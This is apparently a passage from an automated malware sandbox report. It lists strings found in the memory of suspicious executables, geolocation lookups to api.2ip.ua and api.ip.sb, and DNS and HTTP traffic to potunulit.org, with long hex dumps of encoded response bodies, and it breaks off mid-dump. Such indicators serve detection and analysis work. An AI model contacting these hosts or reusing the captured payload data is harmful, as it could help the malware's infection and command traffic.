Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/V
Source: 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: C4AA.exe, 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, C4AA.exe, 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, C4AA.exe, 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: unknown DNS traffic detected: queries for: potunulit.org
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Fih9XRZVfiHb6ul5lDe89E96SyIR%2B8f8Z05%2BaTBePa9Sxmz3Wr50lxG68ZyAwNwaaVf5qg7yvvxrt56vC4ZRnB%2BVkX4C8ZLJHmFe47CsFxNy%2FMwhQCasP1k3e6S1nuQU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa24c791e9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 0d 0a 03 00 00 00 1f 3d 53 0d 0a Data Ascii: 7=S
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EDSp5MowyujsafEdpguYy7bJLZ51FtpeE2S33L5xlU0bVdcA5%2FWFoCLEbpKtJiVcQ0MWs5QhCB%2FyebFjp4q%2Bup9lZsvFb0GjshaOPbMzOB1E%2F88CeRtfq9FSMzkt60gE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa24d6ab59b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 96 a5 d1 a6 8f 3a c7 cf 23 6a 3c 03 ff f9 e0 c0 64 6b 52 e1 32 c7 0d c9 f7 df c9 42 d2 09 e6 00 c6 04 25 76 13 21 82 77 a3 10 10 0f 50 0b 84 cd 01 1c 6d 4c 66 58 e8 1b 3d eb 35 ee de 80 0e 70 06 30 12 95 c5 c8 98 66 73 fd 10 68 f5 6b cc e3 bf 6c 13 d9 1e 1c 8d 79 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 54 53 51 3a 05 fc 1d 09 52 2b e5 8d 83 7b 9e 45 f5 fe 73 8c 5c db c4 ff 13 13 bf 92 e4 92 24 08 4f c5 7c e7 cb a1 61 6e de f5 69 a9 18 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a 04 38 7c 88 2c c8 48 69 70 c6 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 bf 78 f5 1a 0c 9b 4a d8 19 8e c8 4f 13 f6 80 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 c5 08 31 e5 98 90 f7 0f e4 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac 47 c6 d9 55 7d af ba 68 92 0e ff 9d 7f 7f 
55 40 57 74 7b 39 ee e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 27 af a1 90 4e b1 54 55 a5 7c b7 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 7c fc 04 f1 2c 4e af 03 5b 51 1d e4 a6 8b 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 d1 fe f3 94 0a 15 d7 ec 8a c3 e0 2b 59 b7 bb 01 7e 17 28 d2 04 45 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 5c e7 47 9c 3c 21 c4 3a 96 9e c9 e7 17 3f dc e1 7e 4d a2 70 d4 03 45 af 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e7 23 de ab b6 5f 29 43 43 5f 56 03 62 18 2a 19 f8 40 ae ae 88 c1 76 a2 33 25 7d da a9 c3 e8 c8 2f Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*:#j<dkR2B%v!wPmLfX=5p0fshkly3Ob>!Z:V?sBTSQ:R+{Es\$O|ani~_TzN,%Qa8|,HipJ
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PaSUQmFCXQiZ62bGa4o49xj0GsuzztoRdgziCG3KHu0xLUxRRUQmPHUvnUMTX3qcViCUiEHrHOU8I3UFky32DQn8Sfndb09rBhpkOSnLm8aMTnUtcOP2ZuWejbmvZdI8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2520a609b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The 
requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgR2wOy0u9tVXVWMgJqVmojQFe7TPptd7QLwjsfNsgbNWXbSiBtdDuk8K4NHbezpdhqRLODa6YKDfw1lHobbEO%2B5VbPdr5SiV5bk6fs8Qu8%2FU9RSVpliQu%2BYDoXYjc6j"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2532c3d9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 61 37 33 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 90 eb 68 9f 89 74 7e f6 25 24 85 3a f9 b7 59 f9 62 25 fa d8 0d 89 b4 f0 f1 91 66 7b bf 47 5f 39 f9 de 64 4f 7a 6f 3b 4e 82 98 d3 36 d5 45 3d f4 19 00 51 75 34 16 51 22 3b a5 92 d7 d8 ce b7 49 00 7e ae ac c3 86 21 5f 36 f8 37 33 f2 25 75 da ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 ba aa 8f 74 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e d7 f6 ff 78 d7 d5 d9 c4 0d 13 13 89 66 e1 92 24 18 4f c5 03 11 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ba 74 94 be 21 51 61 46 d0 35 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d eb 6b e5 0e c0 eb 7e 71 eb f0 74 18 38 b7 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 e2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f bb 93 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 83 7e 
55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 65 fa de 8e 82 11 e8 e4 1f cc a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 fc ab fa 1d d4 ec 69 91 9c 1d 0f f1 2c c8 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 9c 95 8b 8b e1 12 fb d5 9c a6 c3 e0 2b 63 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 Data Ascii: 7a73`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*ht~%$:Yb%f{G_9dOzo;N6E=Qu4Q";I~!_673%up"XJ3Ob>!ZC:>tSSQ*{~xf$Oa~i~]DzN,t!QaF5|(
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M7uMaJBPHeyY9GKg%2Fg7YkyxACawcmVOgSR1WzbqjvIp0VD1g6PxbHV%2F2z01onKr2ssIMLk3cX3zkGYxEAo397a6ExuyQnpXgUIlpXT69iDEmPWT1xsCJtahl8g1ux4ci"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2846af69b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mFqif1qzqdphc7%2Fsagwlbzd3Nj4Ho3wUo73DOvIpy79Q%2BA4%2F9pfoWLsJosBeXtKzOkSROVVu9nklvYlEoJ7MN1FfVM%2FRrd2l41ebpHIkmeBkw7JujOYFwB%2BWk8sIn4c7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2862dfa9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 35 62 65 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 45 f9 be 81 5c 66 a8 e8 f0 36 53 24 2c a5 8f e7 b7 37 3d c6 e6 9b 62 ee 24 83 a6 65 03 55 89 27 15 58 4a 51 ed 7d ed 50 70 4c 7f 28 8d 57 eb ea d2 40 02 6b a6 04 87 3c ee b7 5a c9 0e dc 61 57 d5 6c 7d b2 16 94 f7 41 be f3 79 4f 23 37 a3 c4 29 35 5b a5 cc 40 e2 5e 61 26 01 56 cf 43 b1 4e a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f2 ff 8a f3 9a b8 c4 0d 13 13 bf 1e e1 92 c4 08 4d c4 08 a0 c2 a1 61 d0 cb f5 69 4f 3a 17 7e 5f af 9a ce a0 c9 a0 c1 a9 dd 7a 0d 50 5b 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9f d4 3e 7c 88 28 c8 48 6e a1 c0 4a 9a 03 fd ec 9e 7a 42 ac 87 2b bd 61 3f 9b 44 bf 44 34 bd 79 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae 48 7f 17 4c 25 56 ad f3 57 fb 1c b9 42 53 ce 23 b2 75 0e 31 79 92 90 f7 df 09 f4 e7 ea 3f 4c 80 d0 92 c0 13 ff 0d bb d6 3f f0 29 27 c8 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 
7f 55 40 d7 bf 6e 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 27 28 66 91 8b 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 04 85 f2 5b 1e 44 ab 1e 26 d3 04 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 97 7b 85 d2 1c 10 9f da 89 d9 b0 99 c7 8c 8a cd d6 7f 74 79 e2 78 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 fb 2f 1e 76 5c b3 ae 46 1f ec 1b 8a 7a 8f f6 7d e3 cd c0 d9 37 00 64 f6 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 be 63 d4 03 a6 60 eb ac 98 46 d3 0d ca 82 0f 13 2e 9f 28 cc ec 35 6c d6 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 58 3a 1d b8 6e d8 cb e4 ae a7 a1 33 f1 34 da a9 c3 68 Data Ascii: 15be`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*E\f6S$,7=b$eU'XJQ}PpL(W@k<ZaWl}AyO#7)5[@^a&VCN:V?#BSSR+{2DMaiO:~_zP[,'Qa>|(HnJ
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JBK5aG5%2BhecL%2F6fMFpTYTUHGnP1aX6gT1rKVvZ52faPxpehMI84k2wf5ujtEZHugvAzglzmYi7LSKdQbjkTYsffV6BE9zhKiHapbMS8O8NbNXPNvOlv4L2F8QKiiQaBk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa297dcd19b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dIb%2FbzBntbzOkZhS061kRh6WZX7x0NSVVdR89OCmd0nwEJxIud0ucEpvreMYV8tJe7z6ZG%2FLYAqwfB5X1Hjj%2B0G0tiSl4H4DYsPnHQb9vUa5W70AmL6Ds5MIzxnGdcqo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2999fd69b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 